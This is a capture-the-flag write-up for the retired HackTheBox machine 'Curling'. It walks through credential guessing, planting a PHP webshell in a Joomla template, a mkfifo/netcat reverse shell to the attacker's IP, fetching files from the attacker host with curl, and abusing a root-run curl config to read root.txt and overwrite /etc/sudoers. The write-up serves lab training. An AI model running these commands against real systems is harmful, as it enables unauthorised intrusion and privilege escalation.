HackTheBox - Curling - Retired - Update

HackTheBox - Curling - Retired - Update

Recon

I've been using threader3000 for my recon scans lately. It does a super quick threaded up/down scan on all TCP ports. It then recommends a nmap scan based on only the open ports discovered during the initial scan, it saves all the nmap scan output to XML that I then convert to HTML to make it pretty.

Looks like we just have two ports open 22 and 80

Port 22 is Open SSH 7.6p1

Port 80 is Apache 2.4.29

And nmap thinks it's an ubuntu box.

That version of SSH is not terrible old so we can assume this will not be a path for a foothold. Let's check out port 80 and see what we can find there.

We see a page with a login form.

Do you see the first clue for the box here? 

Cewl…. That is a program we can use to scrape words of the page.

So it might come in handy for finding a username or password for the login.

Let's run it and see what it comes back with.

By default the tool looks 3 level deep within a site and only returns possible strings that are 3 characters long and doesn't include numbers.

If we can find password here that might not be the best thing for us as they normally contain numbers or special characters so I usually modify those two things when doing a cewl scan.

-d controls the depth

--with-numbers controls whether it returns strings with numbers in them

cewl -d 5 --with-numbers curling.htb > cewl.txt

This will also create list of the output incase we need to have it as a word list later on.

We can see what might be a password pretty quickly in the list strings.

curling2018

But what might the user name be?

Look just two down from curling2018… Floris that's a name right?

Let's try to login with these creds.

Nope but that was a good guess I think.

Let's continue on this path.

What if the site requires a special character to be included in the password.

curling2018!

curling2018@

curling2019

curling2020

Curling2018!

Curling2018@

Curling2019

We can build out a list of these types of modifications I just tried them at random

One of these did work for us

floris

Curling2018!

Can't do a whole lot here other than edit posts, which I think might be a path, but let's brute force the server and see if we can find anything else it might be serving up.

dirb http://curling.htb

Dirb found a lot of directories but one jumps out to us 

/administrator

Let's try it out

A joomla administration login page…. I wonder if it uses the same creds that we found earlier?

Yarp

Ok now we can do a lot more to this site.

Googling for Joomla Webshell We found this result

https://seclists.org/oss-sec/2015/q2/759

It says we can change the type of files allowed on the server and upload a webshell with a .php3 extension to get our web shell..

I googled around some more and found another site that says we don't even need to mess with file types we can leverage templates to get our webshell because it already allows php

https://0xnntt.wordpress.com/2017/06/16/from-administrator-to-superuser-joomla-3-6-4/

Exploit

OK I grabbed a copy of my current favorite php webshell WhiteWinterWolf

https://github.com/WhiteWinterWolf/wwwolf-php-webshell

Navigated to template in the Joomla Admin page, went into one of the templates already installed called beez3 and created a new file and just inserted the php code directly there.

I called the file wwwshell.php

Earlier in our Dirb output we saw a folder named /templates/

So I'm guessing that we should be able to find our php at /templates/beez3/wwwshell.php

And we do 

We have execution as www-data. Let's try to use it to get a real shell.

Let's setup a new netcat listener on our kali box

nc -lnvp 5555

And pop this into our webshell

Nc 10.10.14.9 5555 -e /bin/sh

Well this version of nc doesn't allow -e

But when this doesn't work normally mkfifo will

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.9 5555 >/tmp/f

And now we have our proper shell

Poking around in the /var/www folder I found this file called secret.txt

Looks like some base64 that de-encodes to the password we already found out about.

Interesting.

There is also a configuration.php file which contains this.

mYsQ!P4ssw0rd$yea!

I tried to ssh as floris with this and no dice.

I was surprised to find we had access to floris' user directory.

We don't have access to the user.txt file……

But we can read password_backup

Let's see what the password_backup is.

We want to make a copy of this to see if we can make heads or tails of this.

So the first thing I tried to do here was run strings against the file to see if we could get any data out if it.

Strings is not installed.

Ok next lets try xxd -r

Which would take the hex we see and hopefully restore it to the binary it used to be.

xxd -r ./password_backup newbackup

Now if we run file on newbackup we see its a bzip2 file, we can use mv to rename the file with the correct extension.

mv newbackup newbackup.bz2

Then we can unzip it

bzip2 -d newbackup.bz2

This name the file newbackup

If we run file on it again, we can see it's now a gzip file….. OMG

Let's rename it 

mv newbackup newbackup.gz

And then unzip that.

And now it's bzip2 again… I think we're are going to go through some loops here to get to the root of this file

We go through the same process of renaming the bzip file and unzip it

And now its a tar file

mv newbackup newbackup.tar

Then we untar it

And now its just a txt file named password.txt

Finally

5d<wdCbdZu)|hChXll

Guess what? we can SSH in as floris now

And we can get to user.txt now

In Floris' home directory there are some folders named /admin-area

Inside we see two files owned by root.

Input & report

If we check the input file

$ cat input url = "http://127.0.0.1"

And report

Looks like the output of a curl request of the default webpage which would be at http://127.0.0.1

We have read/write on both of these files.

If we take a look at the curl documentation we see that we can use it to read local files with file://

So what if we change the input file to read out root.txt?

echo url = 'file:///root/root.txt' > input

Then just we can just keep using head to look at report and see if we get our flag when this fires.

There it is, we got the root.txt file 

That's nice but we would rather have a full shell as root.

There are a number of different methods we could go with here.

We could grab the /etc/shadow file using the same method and unshadow it with /etc/passwd and try to break the password.

I tried this first and it didn't work for me, I didn't crack the password using rockyou.txt

I wonder if we can control the output and try to overwrite another file like sudoers or authorized_keys to get access.

So let's modify the input file to have a second variable named output

I created it on my kali box and used curl on curling and updog on my kali box to overwrite input on curl

url = "file:///root/root.txt" output = "/tmp/circusmonkey/root.txt"

curl http://10.10.14.10:9090/input --output ./input

And after a little wait we do see the /root.txt in my /tmp/circusmonkey folder.

Ok so now we just need to modify our sudoers file to give floris all sudo permissions.

Let's create an new sudoers file in 

Let's create our new sudoers file in our /tmp/circusmonkey directory

echo "floris    ALL=(ALL:ALL) ALL" > /tmp/circusmonkey/sudoers

Now we modify our input file on our kali box to read this file and overwrite /etc/sudoers

url = "file:///tmp/circusmonkey/sudoers" output = "/etc/sudoers"

I created a new file with this as input-sudoers ( to keep it separate from the original we created)

Then I used updog and curl again to overwrite the input file in the admin area

curl http://10.10.14.10:9090/input-sudoers --output ./input

Now we just have to wait for the script to run and try to do sudo su as floris

Much better